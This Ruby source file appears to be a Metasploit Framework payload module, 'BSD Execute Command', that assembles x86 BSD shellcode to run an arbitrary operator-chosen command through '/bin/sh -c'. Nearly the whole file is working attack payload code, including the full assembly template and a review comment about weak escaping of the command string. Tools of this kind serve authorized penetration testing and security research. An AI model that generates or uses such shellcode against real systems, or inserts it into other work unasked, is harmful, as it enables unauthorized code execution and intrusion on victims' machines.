##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

###
#
# Exec
# ----
#
# Executes an arbitrary command.
#
###
module Metasploit3

  include Msf::Payload::Single
  include Msf::Payload::Bsd

  #
  # Sets up the module metadata (name, author, platform, architecture)
  # and declares the single required option, CMD.
  #
  # info - caller-supplied module information; it is combined with the
  #        values below through merge_info before being handed to super.
  #
  def initialize(info = {})
    module_info = {
      'Name'        => 'BSD Execute Command',
      'Version'     => '$Revision$',
      'Description' => 'Execute an arbitrary command',
      'Author'      => 'vlad902',
      'License'     => MSF_LICENSE,
      'Platform'    => 'bsd',
      'Arch'        => ARCH_X86
    }
    super(merge_info(info, module_info))

    # CMD is mandatory (first element of the option attributes is true).
    exec_options = [
      OptString.new('CMD', [ true, "The command string to execute" ])
    ]
    register_options(exec_options, self.class)
  end

  #
  # Builds the payload from the user's options.
  #
  # Reads CMD from the datastore (empty string when unset), substitutes it
  # for the CMD placeholder in the assembly template, assembles the result
  # with Metasm for Ia32 and returns the encoded string.
  #
  # The template pushes the byte values that spell "//bin/sh" and "-c",
  # embeds the command as a NUL-terminated string after `call getstr`, and
  # issues int 0x80 with eax = 0x3b.
  #
  # NOTE(review): only double quotes are escaped before the command is
  # placed inside the `db "..."` literal. Backslash sequences and newlines
  # in CMD are not normalised, and String#gsub interprets backslash
  # references in its replacement argument; confirm this is acceptable
  # for the values operators are expected to supply.
  #
  def generate_stage
    command = datastore['CMD'] || ''
    template = <<-EOS
;;
;
;        Name: single_exec
;   Platforms: *BSD
;      Author: vlad902
;     Version: $Revision$
;     License:
;
;        This file is part of the Metasploit Exploit Framework
;        and is subject to the same licenses and copyrights as
;        the rest of this package.
;
; Description:
;
;        Execute an arbitary command.
;
;;
; NULLs are fair game.

  push 0x3b
  pop eax
  cdq

  push edx
  push 0x632d
  mov edi, esp

  push edx
  push 0x68732f6e
  push 0x69622f2f
  mov ebx, esp

  push edx
  call getstr
db "CMD", 0x00
getstr:
  push edi
  push ebx
  mov ecx, esp
  push edx
  push ecx
  push ebx
  push eax
  int 0x80
EOS

    # Escape embedded double quotes so the command stays inside the
    # assembler string literal, then fill in the placeholder.
    quoted_command = command.gsub('"', "\\\"")
    source = template.gsub(/CMD/, quoted_command)

    Metasm::Shellcode.assemble(Metasm::Ia32.new, source).encode_string
  end

end